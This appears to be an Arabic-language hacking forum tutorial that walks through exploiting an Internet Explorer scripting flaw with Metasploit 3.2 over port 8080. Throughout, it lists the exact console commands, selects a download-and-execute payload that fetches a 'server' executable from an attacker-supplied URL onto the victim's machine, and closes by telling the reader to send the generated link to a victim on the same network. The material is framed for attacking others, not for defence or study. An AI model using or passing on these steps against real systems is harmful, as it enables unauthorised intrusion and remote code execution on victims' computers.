# الـسسـلآآم عليـكم ورحمـة الله وبركـآتـه #
صبـآح / مـسـآء الورد #
اليـوم مسسـوي لكـم درس طــآزج توهـ طـآلـع من الفـرن #
درسسنـآ اليـوم يتكلـم عـن #| اسسـتغـلآآل ثغرة متصفـح اكسبلورر بالميتاسبلويت |#
الاخترآق رآح يكـون عن طريـق بـورت [ 8080 ] #
رآح استخـدم الميتـآسبلـويـت الاصدآر [ 3.2 ] #
طيـب في البدآيـة نفتـح الـ [ Metasploit Console ] #
الآن نكتـب الامـر [ use ] وبعده اسـم الثغـره [ windows/browser/ie_unsafe_scripting ] #
يعنـي يصيـر الامـر [ use windows/browser/ie_unsafe_scripting ] #
ونضغـط انتـر
طيـب الآن نبـحـث عن البـآيلـود المنـآسـب بالامـر [ show payloads ] #
رآح يـسسـتعرض لنـآ الكثيـر من البـآيلودآت نختـآر منهـآ المنـآسـب #
وانا افـضل بـآيلـود { رفـع بـآتش في جهـاز الضحيـه وتشغيـلـه } #
نكتـب الامـر [ set ] وبعده نكتـب [ PAYLOAD ] ونكتـب بعد كـذآ اسـم البـآيـلود [ windows/download_exec ] #
يعني يصيـر الامـر كـآمـل [ set PAYLOAD windows/download_exec
الآن يبي لنـآ نـشِـوف وش تحتـآج الثغـره عـششـآن نقـدر نكمـل الاستغـلآآل نكتـب الامـر [ show options ] #
يطلـب مننـآ الـ [ SRVHOST ] الـي هو الآي بي تبعـك انا رآح اكتـب الآي بي الافتـرآضـي [ 127.0.0.1 ] #
نكتـب [ set SRVHOST 127.0.0.1 ] بدل [ 127.0.0.1 ] الى الآي بي حقـك #
ويطلـب مننـآ بعـد رآبط السيـرفـر المبـآشر نكتـب [ set URL www.stie.com/server.exe ] #
بدل [ www.stie.com/server.exe ] الى رآبط سيرفرك المبـآشر #
نكتـب set URL www.stie.com/server.exe
ونضغـط انتـر
الآن بـآقـي لنـآ تطبيـق الثغـره #
نكتـب الامـر الجبـآر [ exploit ] لتطبيـق الثغـره #
ونضغـط انتـر
انسـخ الرآبط المحدد بالاخضـر واعطيـه للضحيـه #
~| بـس بـششـرط يكـون الضحيـه عنـدك بنفـس الشبكـه |~
